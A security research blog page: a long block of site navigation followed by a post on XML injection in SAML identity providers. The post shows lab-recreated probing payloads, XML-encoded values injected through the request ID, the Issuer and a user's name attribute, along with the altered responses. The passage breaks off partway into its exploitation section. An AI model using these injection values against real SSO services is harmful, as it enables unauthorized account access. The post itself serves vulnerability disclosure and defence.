Public Report – Matrix Olm Cryptographic Review
Research Insights Volume 8 – Hardware Design: FPGA Security Risks
Zcash Cryptography and Code Review
Optimum Routers: Researching Managed Routers
Peeling back the layers on defence in depth…knowing your onions
End-of-life pragmatism
iOS Instrumentation Without Jailbreak
The Password is Dead, Long Live the Password!
Microsoft Office Memory Corruption Vulnerability
Windows 10 USB Mass Storage driver arbitrary code execution in kernel mode
Elephant in the Boardroom Survey 2016
A Peek Behind the Great Firewall of Russia
Avoiding Pitfalls Developing with Electron
Flash local-with-filesystem Bypass in navigateToURL
D-Link routers vulnerable to Remote Code Execution (RCE)
iOS Application Security: The Definitive Guide for Hackers and Developers
The Mobile Application Hacker’s Handbook
Research Insights Volume 9 – Modern Security Vulnerability Discovery
Post-quantum cryptography overview
The CIS Security Standard for Docker available now
An adventure in PoEKmon NeutriGo land
The Shellcoder’s Handbook: Discovering and Exploiting Security Holes, 2nd Edition
How will GDPR impact your communications?
Potential false redirection of web site content in Internet in SAP NetWeaver web applications
Multiple security vulnerabilities in SAP NetWeaver BSP Logon
The Automotive Threat Modeling Template
My name is Matt – My voice is my password
Ransomware: How vulnerable is your system?
NCC Group WhitepaperUnderstanding and HardeningLinux ContainersJune 29, 2016 – Version 1.1
My Hash is My Passport: Understanding Web and Mobile Authentication
Project Triforce: Run AFL on Everything!
Writing Exploits for Win32 Systems from Scratch
How to Backdoor Diffie-Hellman
Local network compromise despite good patching
Sakula: an adventure in DLL planting
When a Trusted Site in Internet Explorer was Anything But
GSM/GPRS Traffic Interception for Penetration Testing Engagements
An Adaptive-Ciphertext Attack Against “I ⊕ C” Block Cipher Modes With an Oracle
Creating a Safer OAuth User Experience
Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
Aurora Response Recommendations
Blind Security Testing – An Evolutionary Approach
Building Security In: Software Penetration Testing
Cleaning Up After Cookies
Command Injection in XML Signatures and Encryption
Common Flaws of Distributed Identity and Authentication Systems
Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
Developing Secure Mobile Applications for Android
Exposing Vulnerabilities in Media Software
Hunting SQL Injection Bugs
IAX Voice Over-IP Security
ProxMon: Automating Web Application Penetration Testing
iSEC’s Analysis of Microsoft’s SDL and its ROI
Secure Application Development on Facebook
Secure Session Management With Cookies for Web Applications
Security Compliance as an Engineering Discipline
Weaknesses and Best Practices of Public Key Kerberos with Smart Cards
Exploiting Rich Content
HTML5 Security The Modern Web Browser Perspective
An Introduction to Authenticated Encryption
Attacks on SSL
Content Security Policies Best Practices
Windows Phone 7 Application Security Survey
Browser Extension Password Managers
Introducing idb-Simplified Blackbox iOS App Pentesting
Login Service Security
The factoring dead: Preparing for the cryptopocalypse
Auditing Enterprise Class Applications and Secure Containers on Android
Early CCS Attack Analysis
Analysis of Boomerang Differential Trials via a SAT-Based Constraint Solver URSA
Perfect Forward Security
Internet of Things Security
Secure Messaging for Normal People
Understanding and Hardening Linux Containers
Adventures in Windows Driver Development: Part 1
Private sector cyber resilience and the role of data diodes
From CSV to CMD to qwerty
General Data Protection Regulation – are you ready?
Business Insights: Cyber Security in the Financial Sector
The Importance of a Cryptographic Review
osquery Application Security Assessment Public Report
Sysinternals SDelete: When Secure Delete Fails
Ricochet Security Assessment Public Report
Breaking into Security Research at NCC Group
Building Systems from Commercial Components
Modernizing Legacy Systems: Software Technologies, Engineering Processes, and Business Practices
Secure Coding in C and C++
CERT Oracle Secure Coding Standard for Java
CERT C Secure Coding Standard
Java Coding Guidelines: 75 Recommendations for Reliable and Secure Programs
Professional C Programming LiveLessons, (Video Training) Part I: Writing Robust, Secure, Reliable Code
Secure Coding in C and C++, 2nd Edition
The CERT® C Coding Standard, Second Edition: 98 Rules for Developing Safe, Reliable, and Secure Systems
Secure Coding Rules for Java LiveLessons, Part 1
Hacking Displays Made Interesting
What the HEC? Security implications of HDMI Ethernet Channel and other related protocols
44CON Workshop – How to assess and secure iOS apps
Payment Card Industry Data Security Standard (PCI DSS) A Navigation and Explanation of Changes from v2.0 to v3.0
Mobile World Congress – Mobile Internet of Things
Practical SME security on a shoestring
BlackHat Asia USB Physical Access
How we breach network infrastructures and protect them
Hacking a web application
Batten down the hatches: Cyber threats facing DP operations
Threats and vulnerabilities within the Maritime and shipping sectors
Distributed Ledger (Blockchain) Security and Quantum Computing Implications
Abusing Privileged and Unprivileged Linux Containers
A few notes on usefully exploiting libstagefright on Android 5.x
NCC Con Europe 2016
Remote Exploitation of Microsoft Office DLL Hijacking (MS15-132) via Browsers
Phishing Mitigations: Configuring Microsoft Exchange to Clearly Identify External Emails
Car Parking Apps Vulnerable To Hacks
eBook – Do you know how your organisation would react in a real-world attack scenario?
Erlang Security 101
SysAid Helpdesk blind SQL injection
SysAid Helpdesk stored XSS
Virtual Access Monitor Multiple SQL Injection Vulnerabilities
Whatsupgold Premium Directory traversal
Windows remote desktop memory corruptoin leading to RCE on XPSP3
Windows USB RNDIS driver kernel pool overflow
Drones: Detect, Identify, Intercept, and Hijack
Introducing Chuckle and the Importance of SMB Signing
Threat Intelligence: Benefits for the Enterprise
Best Practices for the use of Static Code Analysis within a Real-World Secure Development Lifecycle
Secure Device Manufacturing: Supply Chain Security Resilience
eBook – Planning a robust incident response process
HDMI Ethernet Channel
Advanced SQL Injection in SQL Server Applications
USB keyboards by post – use of embedded keystroke injectors to bypass autorun restrictions on modern desktop operating systems
ASP.NET Security and the Importance of KB2698981 in Cloud Environments
Xen HYPERVISOR_xen_version stack memory revelation
Windows Remote Desktop Memory Corruption Leading to RCE on XPSP3
SysAid Helpdesk Pro – Blind SQL Injection
Symantec Messaging Gateway SSH with backdoor user account + privilege escalation to root due to very old Kernel
Symantec Messaging Gateway Out of band stored XSS delivered by email
Symantec Messaging Gateway Easy CSRF to add a backdoor-administrator (for example)
Symantec Messaging Gateway Arbitrary file download is possible with a crafted URL (authenticated)
Symantec Backup Exec 2012 – Persistent XSS Vulnerability Affecting Custom Reports
Symantec Backup Exec 2012 – OS version and service pack information leak
Symantec Backup Exec 2012 – Linux Backup Agent Heap Overflow
Symantec Backup Exec 2012 Backup/Restore Data Traverses Memory with Weak ACLs
Symantec Backup Exec 2012 – Backup Exec Utility Stored XSS when adding Groups, Servers and Computers
Squiz CMS File Path Traversal
Solaris 11 USB Hub Class descriptor kernel stack overflow
SmarterMail – Stored XSS in emails
Remote code execution in ImpressPages CMS
OS X 10.6.6 Camera Raw Library Memory Corruption
Oracle Java Installer Adds a System Path Which is Writable by All
Oracle Hyperion 11 Directory Traversal
Oracle E-Business Suite Pre-Auth SQLi with DBA Privileges
Nessus Authenticated Scan – Local Privilege Escalation
NCC Group Malware Technical Note
Nagios XI Network Monitor – Stored and Reflective XSS
Multiple Vulnerabilities in MailEnable
Microsoft Internet Explorer CMarkup Use-After-Free
McAfee Email and Web Security Appliance v5.6 – Session hijacking (and bypassing client-side session timeouts)
McAfee Email and Web Security Appliance v5.6 – Password hashes can be recovered from a system backup and easily cracked
McAfee Email and Web Security Appliance v5.6 – Arbitrary file download is possible with a crafted URL, when logged in as any user
McAfee Email and Web Security Appliance v5.6 – Any logged-in user can bypass controls to reset passwords of other administrators
McAfee Email and Web Security Appliance v5.6 – Active session tokens of other users are disclosed within the UI
iOS 7 arbitrary code execution in kernel mode
Understanding Microsoft Word OLE Exploit Primitives
Understanding Microsoft Word OLE Exploit Primitives: Exploiting CVE-2015-1642 Microsoft Office CTaskSymbol Use-After-Free Vulnerability
Porting the Misfortune Cookie Exploit: A Look into Router Exploitation Using the TD-8817
Vehicle Emissions and Cyber Security
Research Insights Volume 6: Common Issues with Environment Breakouts
Does TypeScript Offer Security Improvements Over JavaScript?
Common Security Issues in Financially-Oriented Web Applications
Research Insights Volume 3 – How are we breaking in: Mobile Security
Build Your Own Wi-Fi Mapping Drone Capability
Exploiting CVE-2015-2426, and How I Ported it to a Recent Windows 8.1 64-bit
Exploiting MS15-061 Use-After-Free Windows Kernel Vulnerability
Password and brute-force mitigation policies
Understanding Ransomware: Impact, Evolution and Defensive Strategies
libtalloc: A GDB plugin for analysing the talloc heap
Lumension Device Control (formerly Sanctuary) remote memory corruption
LibAVCodec AMV Out of Array Write
Increased exploitation of Oracle GlassFish Server Administration Console Remote Authentication Bypass
Flash security restrictions bypass: File upload by URLRequest
Immunity Debugger Buffer Overflow
DataArmor Full Disk Encryption 3.0.12c – Restricted Environment breakout, Privilege Escalation and Full Disk Decryption
Cups-filters remote code execution
Critical Risk Vulnerability in SAP Message Server (Heap Overflow)
Critical Risk Vulnerability in SAP DB Web Server (Stack Overflow)
Critical Risk Vulnerability in Ingres (Pointer Overwrite 2)
Critical Risk Vulnerability in Ingres (Pointer Overwrite 1)
Cisco VPN Client Privilege Escalation
Cisco IPSec VPN Implementation Group Name Enumeration
Blue Coat BCAAA Remote Code Execution Vulnerability
BlackBerry Link WebDav Server Bound to the BlackBerry VPN Adapter
Bit51 Better Security WP Security Plugin – Unauthenticated Stored XSS to RCE
Back Office Web Administration Authentication Bypass
AtHoc Toolbar
ASE 12.5.1 datatype overflow
Archived Technical Advisories
Apple QuickTime Player m4a Processing Buffer Overflow
Apple OSX/iPhone iOS ImageIO TIFF getBandProcTIFF TileWidth Heap Overflow
Apple Mac OS X ImageIO TIFF Integer Overflow
Apple CoreAnimation Heap Overflow
Writing Small Shellcode
Writing Secure ASP Scripts
Windows 2000 Format String Vulnerabilities
The Pentesters Guide to Akamai
Adobe flash sandbox bypass to navigate to local drives
Adobe Flash Player Cross Domain Policy Bypass
Adobe Acrobat Reader XML Forms Data Format Buffer Overflow
Tool Release: Introducing opinel: Scout2’s favorite tool
Broadcasting your attack – DAB security
Modelling Threat Actor Phishing Behaviour
Research Insights Volume 7: Exploitation Advancements
Exploiting the win32k!xxxEnableWndSBArrows use-after-free (CVE-2015-0057) bug on both 32-bit and 64-bit
The Demise of Signature Based Antivirus
Stopping Automated Attack Tools
Security of Things: An Implementers’ Guide to Cyber-Security for Internet of Things Devices and Beyond
Security Best Practice: Host Naming & URL Conventions
Securing PL/SQL Applications with DBMS_ASSERT
Second-Order Code Injection Attacks
Revealing Embedded Fingerprints: Deriving Intelligence from USB Stack Interactions 2013
Research Insights Volume 4 – Sector Focus: Maritime Sector
Research Insights Volume 2 – Defensive Trends
Research Insights Volume 1 – Sector Focus: Financial Services
Quantum Cryptography – A Study Into Present Technologies and Future Applications
Protecting stored cardholder data (an unofficial supplement to PCI DSS V3.0)
Preparing for Cyber Battleships – Electronic Chart Display and Information System Security
Passive Information Gathering – The Analysis of Leaked Network Security Information
Oracle Passwords and OraBrute
Oracle Forensics Part 7 Using the Oracle System Change Number in Forensic Investigations
Oracle Forensics Part 6: Examining Undo Segments, Flashback and the Oracle Recycle Bin
Oracle Forensics Part 5: Finding Evidence of Data Theft in the Absence of Auditing
Oracle Forensics Part 4: Live Response
Oracle Forensics Part 3: Isolating Evidence of Attacks Against the Authentication Mechanism
Oracle Forensics Part 2: Locating Dropped Objects
Oracle Forensics Part 1: Dissecting the Redo Logs
Non-stack Based Exploitation of Buffer Overrun Vulnerabilities on Windows NT 2000 XP
New Attack Vectors and a Vulnerability Dissection of MS03-007
More Advanced SQL Injection
Microsoft’s SQL Server vs. Oracle’s RDBMS
Microsoft SQL Server Passwords
Low Cost Attacks on Smart Cards – The Electromagnetic Side-Channel
Lessons learned from 50 bugs: Common USB driver vulnerabilities
Inter-Protocol Exploitation
Inter-Protocol Communication
Improving your Network and Application Assurance Strategy in an environment of increasing 0day vulnerabilities
Implementing and Detecting a PCI Rootkit
How organisations can properly configure SSL services to ensure the integrity and confidentiality of data in transit
Hackproofing Oracle Application Server
Hackproofing MySQL
Hackproofing Lotus Domino Web Server
Hacking Appliances: Ironic exploits in security products
Fuzzing USB devices using Frisbee Lite
HDMI – Hacking Displays Made Interesting
Exploiting Security Gateways Via Web Interfaces
Research Insights Volume 5 – Sector Focus: Automotive
The why behind web application penetration test prerequisites
Blackbox iOS App Assessments Using idb
Cyber red-teaming business-critical systems while managing operational risk
Blind Return Oriented Programming
Username enumeration techniques and their value
IAM user management strategy (part 2)
Faux Disk Encryption: Realities of Secure Storage On Mobile Devices
Some Notes About the Xen XSA-122 Bug
USB attacks need physical access right? Not any more…
Image IO Memory Corruption
Threat Profiling Microsoft SQL Server
Thin Clients: Slim Security
Impress Pages CMS Remote Code Execution
The Phishing Guide: Understanding & Preventing Phishing Attacks
Lumension Device Control Remote Memory Corruption
McAfee Email and Web Security Appliance Active session tokens of other users are disclosed within the UI
McAfee Email and Web Security Appliance Any logged-in user can bypass controls to reset passwords of other administrators
Bypassing Oracle DBMS_ASSERT (in certain situations)
McAfee Email and Web Security Appliance Arbitrary file download is possible with a crafted URL, when logged in as any user
McAfee Email and Web Security Appliance Password hashes can be recovered from a system backup and easily cracked
McAfee Email and Web Security Appliance Reflective XSS allowing an attacker to gain session tokens
McAfee Email and Web Security Appliance Session hijacking and bypassing client-side session timeouts
Medium Risk Vulnerability in Symantec Enterprise Security Management
Medium Risk Vulnerability in Symantec Network Access Control
Nagios XI Network Monitor Stored and Reflected XSS
NX Server for Linux Arbitrary Files can be read with root privileges
Oracle 11g TNS listener remote Invalid Pointer Read
Oracle 11g TNS listener remote Null Pointer Dereference
Oracle Retail Integration Bus Manager Directory Traversal
Oracle Retail Invoice Manager SQL Injection
OS X Lion USB Hub Class Descriptor Arbitrary Code Execution
PRTG Network Monitor Command injection
Samba Andx Request Remote Code Execution
Samba on the BlackBerry PlayBook
Solaris 11 USB hubclass
Symantec Message Filter Session Hijacking via session
Symantec Message Filter Unauthenticated verbose software version information disclosure
Symantec Messaging Gateway – Addition of a backdoor adminstrator via CSRF
Symantec Messaging Gateway – Authenticated arbritary file download
Symantec Messaging Gateway – Out of band stored XSS via email
Symantec Messaging Gateway – Unauthenticated detailed version disclosure
Symantec Messaging Gateway – Unauthorised SSH access
Symantec PC Anywhere Remote Code Extecution
Adam Roberts
Anthony Ferrillo
Aaron Greetham
Aaron Haymore
Aleksandar Kircanski
Alessandro Fanio Gonzalez
Alessandro Fanio González
Alex Plaskett
Alvaro Martin Fraguas
Álvaro Martín Fraguas
Andrea Shirley-Bellande
Drew Wade
Andy Davis
Andy Grant
Antonis Terefos
anvesh3752
Alexander Smye
aschmitz
Author Test
Ava Howell
Andrew Whistlecroft
balazs.bucsay
Nicolas Bidron
NCC Group Physical Breach Team
Rich Warren
Caleb Watt
Clinton Carpene
Cedric Halbronn
chrisanley
Christo Butcher
Clayton Lowell
Clint Gibler
Contributor Test
corancc
Corey Arthur
Christian Powills
Craig Blackie
Catalin Visinescu
Ken Wolstencroft
Dale Pavey
Damon Small
Dan Hastings
Dave G.
David Tulis
David Cash
Daniele Costa
destoken
Diana Dragusin
Diego Gomez Maranon
Diego Gómez Marañon
Domen Puncer Kugler
Daniel Romero
David Young
Edward Torkington
Exploit Development Group
elenabakoslang
Eli Sohl
epliuncc
Erik Schamper
Erik Steringer
Eric Schorn
fernandogallegopinero
Aaron Adams
Gavin Cotter (Temp)
Gerald Doussot
Gérald Doussot
Giacomo Pope
Global Threat Intelligence
Guy Morley
William Handy
Liew hock lai
Hollie Mowatt
Heather Overcash
Rob Wood
Iain Smart
Izzy Whistlecroft
Jacob Heath
Jameson Hyde
Phillip Langlois and Edward Torkington
Jashan Benawra
Jason Kielpinski
Javed Samuel
James Chambers
Jelle Vergeer
Jennifer Reed
Jeremy Boone
Jerome Smith
Jesus Calderon Marin
Jesús Calderón Marín
Jack Leadford
Joshua Makinen
John Redford
Joost Jansen
Joshua Dow
Jose Selvi
Kenneth Yu
Kat Sommer
Katarina Dabler
Ben Lister
Krijn de Mik
Lars Behrens
Lawrence Munro
Liam Glanfield
Liam Stevenson
Liyun Li
Lucas Rosevear
Luke Paris
Matt Lewis
Manuel Gines
Margit Hazenbroek
Marie-Sarah Lacharite
Mario Rivas
NCC Group & Fox-IT Data Science Team
Max Groot
McCaulay Hudson
Michael Gough
Mostafa Hassan
Matthew Pettitt
Frank Gifford
Michelle Simpson
Neil Bergman
NCC Group
NCC Group Publication Archive
Bill Marquette
Daniel Lopezjimenez
nccdavid
Dan Helton
RIFT: Research and Intelligence Fusion Team
nccgresearchrr
NCC Group Red Team
Ilya Zhuravlev
Jennifer Fernick
ncckai
Lewis Lockwood
Jon Szymaniak
Mark Manning
nccmarktedman
Michael Sandee
Simon Palmer
nccricardomr
Stefano Antenucci
Simone Salucci and Daniel Lopez Jimenez
Samuel Siu
Tanner Prynn
Yun Zheng Hu
Stephen Tomkinson
Nicolas Guigo
Nick Galloway
Nick Muir
Nick Dunn
Nick Sirris
Nikolaos Pantazopoulos
Oliver Brooks
Ollie Whitehouse
Ollie Wen
Parnian Alimi
Paul Bottinelli
Peter Scopes
Peter Hannay
philipmarsdennccgroupcom
Pixel Kicks
Pixel Kicks
pixelkicks-fiona
pixelkicks-fred
pixelkicks-matt.hamer
pixelkicks-turhan
pixelkicks-will
pqueenncc
Philipp Schaefer
qkchambers
Rory McCune
Rami McCarthy
Ray Lai
Robert C. Seacord
Rennie deGraaf
Chris Nevin
Richard Appleby
Rick Veldhoven
Fumik0_
Rindert Kramer
Rob Ince
robertgrimes123
Robert Wessen
Robert Schwass
sampeate
Roger Meyer
schlopeckincc
Siddarth Adukia
Sam Leonard (they/them)
Spencer Michaels
Sander de Jong
Stuart Kurutac
Subscriber Test
Sultan Khan
Swathi Nagarajan
Simon Watson
Jeff Dileo
Thomas Marshall
Ivan Reedman
Thomas Pornin
Jeremy Boone
Viktor Gazdag
Vishtasp Jokhi
Wouter Jansen
William Groesbeck
whoughtonncc
Wordpress SSO Test
Xavier Garceau-Aranda
Ken Gannon
Kevin Henry
5G Security & Smart Environments
Academic Partnership
Annual Research Report
Asia Pacific Research
Awards & Recognition
Books
Business Insights
Cloud & Containerization
Cloud Security
Conferences
Corporate
Cryptography
CTFs/Microcorruption
Current events
Cyber as a Science
Cyber Security
Detection and Threat Hunting
Disclosure Policy
Emerging Technologies
Engineering
Fox-IT
Fox-IT and European Research
Gaming & Media
Hardware & Embedded Systems
Intern Projects
iSec Partners
Machine Learning
Managed Detection & Response
Misinformation, Deepfakes, & Synthetic Media
North American Research
Offensive Security & Artificial Intelligence
Patch notifications
Presentations
protocol_name
Public interest technology
Public Report
Public tools
Reducing Vulnerabilities at Scale
Research
Research Paper
Reverse Engineering
Risk Management & Governance
Standards
Technical advisories
Technology Policy
Threat briefs
Threat Intelligence
Tool Release
Transport
Tutorial/Study Guide
UK Research
Uncategorized
Virtualization, Emulation, & Containerization
Vulnerability
Whitepapers
The Single Sign-On (SSO) approach to authentication controls and identity management was quickly adopted by both organizations and large online services for its convenience and added security. The benefits are clear; for end-users, it is far easier to authenticate to a single service and gain access to all required applications. And for administrators, credentials and privileges can be controlled in a single location. However, this convenience presents new opportunities for attackers. A single vulnerability in the SSO authentication flow could be catastrophic, exposing data stored in all services used by an organization.
This blog post will describe a class of vulnerability detected in several SSO services assessed by NCC Group, specifically affecting Security Assertion Markup Language (SAML) implementations. The flaw could allow an attacker to modify SAML responses generated by an Identity Provider, and thereby gain unauthorized access to arbitrary user accounts, or to escalate privileges within an application.
What is SAML?
To begin, a brief overview of how the SAML authentication flow works has been provided below. Feel free to skip this section if you are already familiar with SAML and SSO in general.
SAML is a standard that allows authentication and authorization data to be securely exchanged between different contexts. It is commonly used in web applications to offer SSO capabilities, and can be easily integrated with Active Directory, making it a popular choice for applications used within enterprise environments.
The authentication process relies on a trust relationship between two parties – the Identity Provider (which authenticates end-users), and the Service Provider (which is the application end-users want to access). Under the most common authentication flow, when a user wants to access a service provider, they will be redirected to the identity provider with a SAML request message.
The identity provider authenticates the user if they are not already logged in, and if this is successful, it redirects the user back to the service provider with a SAML response message (usually in the body of a POST request). The SAML response message will contain an assertion that identifies the user and describes a few conditions (the expiration time for the response and an audience restriction which states the service that the assertion is valid for). The service provider should validate the response, the assertion, and the conditions, and only provide the user with access to the application if the authentication was successful.
To prevent tampering, one or both of the SAML response and assertion should include a cryptographic signature that the service provider can verify. The use of a signature will ensure that a malicious user cannot simply modify the user identifier in the assertion, as the signature will no longer be valid.
A more in-depth summary of SAML can be found
here
on PingIdentity’s website.
The Vulnerability
XML injection is a well-documented vulnerability class, which commonly affected older web applications utilizing XML or SOAP services in the backend. The common case involved user input being directly included in XML messages sent to the backend server. If the user input was not appropriately validated or encoded, an attacker could inject additional XML, and thereby modify request parameters or invoke additional functionality. While still relevant in some applications, XML injection is not nearly as common in 2021, with developers moving to adopt services built on newer data formats such as JSON, YAML, and Protocol Buffers.
In the context of a SAML identity provider, however, XML injection is a concern, as the SAML messages constructed during the authentication flow are XML-based, and contain data that is often sourced from untrusted locations. If this data is included within a SAML assertion or response message dangerously, it may be possible for an attacker to inject additional XML, and change the structure of the SAML message. Depending on the location of the injection and the configuration of the service provider, it may be possible to inject additional roles, modify the receiver of the assertion, or to inject an entirely new username in an attempt to compromise another user’s account. Crucially, it should be noted that the XML for SAML assertions and responses is always built before a cryptographic signature is applied. Therefore, the use of response signatures does not protect against this vulnerability.
This type of vulnerability is most commonly seen in SAML identity providers that naively use string templates to build the SAML XML messages. User-controlled data may be inserted into the template string using a templating language, regex match/replace, or simple concatenation. Although, it is not exclusive to this scenario; even implementations which build the XML using appropriate libraries may fall victim to this vulnerability if the library is used incorrectly.
During a number of security assessments of SAML identity providers, NCC Group has successfully leveraged XML injection vulnerabilities to modify signed assertions, and thereby gain unauthorized access to arbitrary user accounts.
Affected Fields
When constructing the SAML response and assertion, the identity provider is highly likely to include data that can be controlled by the user, either directly or indirectly. Obvious examples include the SAML NameID, which uniquely identifies the user (this may be a numeric identifier, a username, or an email address), and additional attributes when they are requested by the service provider, such as the user’s full name, phone number, or occupation.
However, there are some less obvious fields that are, in most SAML implementations, sourced from the SAML request. A non-comprehensive list of fields in the SAML request that may be included in the SAML response/assertion has been provided below:
-
The
ID
of the SAML request is typically included in the
InResponseTo
attribute of the SAML response. (Note: in identity providers observed by NCC Group, almost all implementations included the SAML request
ID
in the SAML response. This field is therefore considered the most reliable for probing for XML injection vulnerabilities).
-
The
Issuer
field, which identifies the issuer of the SAML request, may be included in the
Audience
field in the SAML assertion.
-
The
IssueInstant
, which states the time the SAML request was generated, may be included in the assertion conditions
NotBefore
attribute.
-
The
Destination
field, which states the endpoint that receives the SAML request. This field may also be used in the
Audience
element of the assertion.
Some implementations may even include data sourced from locations external to the basic SAML authentication flow. To provide an example, in one SAML identity provider, if a SAML request was received from an unauthenticated client, the server issued a redirect to the login page with a GET parameter that included the ID of the SAML request. When the user entered their credentials, the server used the GET parameter ID to look up service provider associated with the SAML request, and then built the SAML response with this ID in the InResponseTo attribute. By modifying the ID GET parameter in the login request, it was possible to inject additional XML into the SAML response.
Identifying the Vulnerability
This vulnerability can be identified using common XML injection probing payloads. The following examples were recreated in a local environment, based on implementations observed during NCC Group security assessments. First, to determine whether XML injection was possible, an intercepting proxy was used to modify the SAML request sent to the identity provider. The payload was inserted into the ID attribute (bolded below) of the request, and is designed to escape from the attribute value and inject an additional attribute value (ncctest); note that the quotes in the payload are XML encoded. This is to ensure that the request XML is still valid; when the value is read by the identity provider, many implementations will XML-decode these entities:
<?xml version="1.0" encoding="UTF-8"?>
<samlp:AuthnRequest AssertionConsumerServiceURL="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" Destination="http://adam.local:8080/SSOService" ID="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA quot; ncctest= quot;BBBB" IssueInstant="2021-02-08T22:39:58Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Version="2.0" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns_samlp="urn:oasis:names:tc:SAML:2.0:protocol">
<saml:Issuer>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/default-sp</saml:Issuer>
<samlp:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/>
</samlp:AuthnRequest>
When this was processed by the identity provider, the ID attribute was included directly within the SAML response template, in the InResponseTo attribute of the samlp:Response and saml:SubjectConfirmationData elements:
<samlp:Response xmlns_samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_fa828226-5b49-4d14-ac7c-fb64e2263f34" Version="2.0" IssueInstant="2021-02-08T23:46:14.988Z" Destination="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" InResponseTo="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA" ncctest="BBBB">
<saml:SubjectConfirmationData NotOnOrAfter="2021-02-08T23:51:14.988Z" Recipient="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" InResponseTo="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA" ncctest="BBBB"/>
If this test is successful, an attempt can be made to inject additional XML elements into the response. While being able to modify the attributes is interesting, it is not particularly useful; if additional XML can be injected, the attacker may be able to modify the SAML assertion, and ultimately gain unauthorized access to another user’s account.
As a basic test, the following SAML request was used to inject an additional XML element (ncc-elem) into the response. As before, the quotes and angle brackets are XML encoded. Also note that the injected element includes another attribute – this is to ensure that the quotes in the template used by the identity provider are balanced, and that the response is valid XML:
<?xml version="1.0" encoding="UTF-8"?>
<samlp:AuthnRequest AssertionConsumerServiceURL="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp" Destination="http://adam.local:8080/SSOService" ID="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA quot; ncctest= quot;BBBB quot; gt; lt;ncc-elem attribute= quot;aaaa" IssueInstant="2021-02-08T22:39:58Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Version="2.0" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns_samlp="urn:oasis:names:tc:SAML:2.0:protocol">
<saml:Issuer>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/default-sp</saml:Issuer>
<samlp:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/>
</samlp:AuthnRequest>
This request produced the following XML in the SAML response:
<samlp:Response
Destination="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/default-sp"
ID="_6788c1c3-03a0-452f-80d5-b0296ec1a097"
IssueInstant="2021-02-08T23:57:49.488Z" Version="2.0"
xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns_samlp="urn:oasis:names:tc:SAML:2.0:protocol"
InResponseTo="_3af7aba034a5dc5ac8c5ddf28805fb832ec683bfffAAAA" ncctest="BBBB">
<ncc-elem attribute="aaaa"/>
A similar process can be used for other injection points. If, for example, the identity provider includes the SAML request Issuer field within the Audience of the response, a payload such as the following could be used to inject additional elements. Note here that it is necessary to encode the angle brackets ( lt; and gt;):
<?xml version="1.0" encoding="UTF-8"?>
<samlp:AuthnRequest AssertionConsumerServiceURL="http://127.0.0.1/simplesaml/module.php/saml/sp/saml2-acs.php/generic-saml-localhost" Destination="http://127.0.0.1:8080/samlp" ID="_0699a57c1e6ac6afc3c2d7ab8cc56dec61cb09b672" IssueInstant="2021-02-11T18:51:31Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Version="2.0" xmlns_saml="urn:oasis:names:tc:SAML:2.0:assertion" xmlns_samlp="urn:oasis:names:tc:SAML:2.0:protocol">
<saml:Issuer>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/generic-saml-localhost/ lt;ncc-test gt;test lt;/ncc-test gt;</saml:Issuer>
<samlp:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/>
</samlp:AuthnRequest>
This request produced the following Audience element in the SAML assertion:
<saml:AudienceRestriction>
<saml:Audience>http://127.0.0.1/simplesaml/module.php/saml/sp/metadata.php/generic-saml-localhost/<ncc-test>test</ncc-test></saml:Audience>
</saml:AudienceRestriction>
For user attributes, the success of injecting XML characters into the SAML assertion will depend on how these attributes are updated and stored by the identity provider; if XSS defenses prevent users from storing characters such as angle brackets in their attributes, it may not be possible to perform the attack. In the following example, setting the user’s name to “Adam</saml:AttributeValue><ncc-test>aaaa</ncc-test><saml:AttributeValue>” produced the following Attribute element in the assertion. In this particular case, it was necessary to close the saml:AttributeValue element and create a new AttributeValue element to pass XML validation performed by the server:
<saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/givenname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi_type="xs:string">Adam</saml:AttributeValue>
<ncc-test>aaaa</ncc-test>
<saml:AttributeValue/>
</saml:Attribute>
Exploiting the Vulnerability
Identifying SAML XML injection vulnerabilities is fairly straightforward, but exploiting them is another story. Success will depend on a multitude of factors, including where the injection points occur, how tolerant of invalid XML the libraries used to sign and parse the SAML response are, and whether the service provider will trust the injected payload. In fact, in some cases where XML injection was possible on the identity provider, a number of service providers rejected or ignored the modified payload. Not because the signature was invalid, but because of repetition in the document.
The nature of this vulnerability will mean that, in many cases, it is necessary to inject repeated elements or to construct entirely new assertions. Problems encountered as a consequence of this include:
-
The service provider may select the original legitimate element (assertion or NameID) created by the identity provider, rather than the injected element. Many XML libraries will behave differently when selecting an element that is repeated in a document; typically, this will either be the first occurrence or the last occurrence.
-
Some security conscious service providers may reject responses containing repeated elements altogether; there is generally no good reason for an assertion to contain two NameID elements, for example.
-
